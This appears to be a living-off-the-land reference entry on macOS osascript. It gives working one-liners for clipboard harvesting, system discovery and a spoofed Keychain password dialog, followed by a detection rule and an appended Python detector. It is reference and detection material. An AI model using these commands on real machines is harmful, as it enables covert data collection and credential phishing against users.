Created by Cedric Owens (@cedowens)
The osascript binary is a command-line utility included in macOS that allows users to run AppleScript and Open Scripting Architecture (OSA) scripts or commands. AppleScript is a scripting language designed for power users to automate tasks and application actions and to interact with the operating system.
|2023-04-19|Collection, Credential Access, Discovery, Execution|clipboard, bash, oneliner, osascript, systeminfo, prompt, jxa|
Use the osascript binary to gather sensitive clipboard data
A bash loop can gather clipboard contents over a defined time period. The following command calls /usr/bin/osascript -e 'return (the clipboard)' indefinitely every 10 seconds and writes clipboard content to a text file.
while true; do echo $(osascript -e 'return (the clipboard)') >> clipdata.txt; sleep 10; done
Use the osascript binary to gather system information
osascript can be used to gather the operating system version, current username, user ID, computer name, IP address, and other information.
osascript -e 'return (system info)'
Use the osascript binary to prompt the user for credentials
osascript can be used to display a dialog box that asks the user to enter the keychain password.
osascript -e 'set popup to display dialog "Keychain Access wants to use the login keychain" & return & return & "Please enter the keychain password" & return default answer "" with icon file "System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:FileVaultIcon.icns" with title "Authentication Needed" with hidden answer'
- Command Line Argument Detection (args contain osascript AND -e AND clipboard)
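The command-line detection above, written out as an added example that is not part of the original page: it applies the page's rule (osascript AND -e AND clipboard) to process-exec argument lists and goes beyond it with two further rules, built as assumptions from the page's system-info and password-dialog commands. The rule names, the `detect` function and the sample events are constructed for illustration.

```python
import re

# osascript invoked with inline source (-e); group 1 is everything after the
# flag. Matching on the joined command line also catches shell wrappers.
OSASCRIPT_E = re.compile(r"\bosascript\b.*?\s-e\s+(.*)", re.I | re.S)

# Rule -> patterns that must ALL appear in the inline script.
# clipboard_read is the page's rule; the other two are assumptions built
# from the page's system-info and password-dialog commands.
RULES = {
    "clipboard_read": [r"\bclipboard\b"],
    "system_info": [r"\bsystem\s+info\b"],
    "credential_prompt": [r"\bdisplay\s+dialog\b", r"\bhidden\s+answer\b"],
}

def detect(argv):
    """Return sorted rule names matched by one process-exec argv list."""
    m = OSASCRIPT_E.search(" ".join(argv))
    if not m:
        return []  # not osascript, or a script file rather than -e
    script = m.group(1)
    return sorted(
        name for name, patterns in RULES.items()
        if all(re.search(p, script, re.I) for p in patterns)
    )

# Constructed sample exec events (argv only), not real telemetry.
SAMPLE_EVENTS = [
    ["osascript", "-e", "return (the clipboard)"],
    ["/bin/bash", "-c", "while true; do echo $(osascript -e 'return (the clipboard)')"
                        " >> clipdata.txt; sleep 10; done"],
    ["/usr/bin/osascript", "-e", "return (system info)"],
    ["osascript", "-e", 'display dialog "Enter password" default answer ""'
                        " with hidden answer"],
    ["osascript", "-e", 'display dialog "Continue?"'],   # no hidden answer
    ["grep", "-e", "clipboard", "notes.txt"],            # not osascript
    ["osascript", "/Users/dev/build.scpt"],              # no inline source
]

if __name__ == "__main__":
    for argv in SAMPLE_EVENTS:
        print(detect(argv) or ["-"], " ".join(argv)[:60])
```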